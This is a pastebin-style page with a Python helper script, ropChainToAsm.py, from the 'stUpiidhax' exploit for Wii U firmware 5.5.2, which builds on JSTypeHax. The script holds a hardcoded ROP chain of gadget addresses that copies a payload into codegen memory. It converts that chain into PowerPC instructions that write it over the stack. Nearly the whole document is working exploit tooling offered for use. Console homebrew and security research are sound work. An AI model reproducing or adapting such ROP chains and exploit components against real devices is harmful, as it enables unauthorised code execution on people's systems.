stUpiidhax, the Wii U 5.5.2 exploit (based on JSTypeHax) http://stupiid.ovh/

ropChainToAsm.py 2.6KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344
  1. # Assemble rop chain into semi-optimized ppc to write over the stack
  2. # ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
  3. # FFFF2222 is a stand in for the payload load address (stored in r7)
  4. # FFFF3333 is a stand in for the payload size (stored in r11)
  5. # place at "found:" in codeloader.s
  6. #This ROP chain was created using:
  7. # ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
  8. # ropchain_appendu32(0x01800000)
  9. # in ropchainBuilder.html
  10. ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
  11. #Generate a list of each value used in the ROP chain for optimization purposes
  12. #Cause no need to load the value in multiple times
  13. ropChainAddresses = []
  14. for i in ropChain:
  15. if not i in ropChainAddresses:
  16. ropChainAddresses.append(i)
  17. # Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
  18. # then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
  19. writeRegister = ''
  20. for address in ropChainAddresses:
  21. if address == 'FFFF2222':
  22. writeRegister = 'r7'
  23. elif address == 'FFFF3333':
  24. writeRegister = 'r11'
  25. elif address[:4] == '0000':
  26. print('li r10, 0x'+address[4:])
  27. writeRegister = 'r10'
  28. else:
  29. print('lis r10, 0x'+address[:4])
  30. if address[4:] != "0000":
  31. print('ori r10, r10, 0x'+address[4:])
  32. last = ropChain.index(address)
  33. while last != -1:
  34. print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
  35. try:
  36. last = ropChain.index(address, last+1)
  37. except ValueError:
  38. last = -1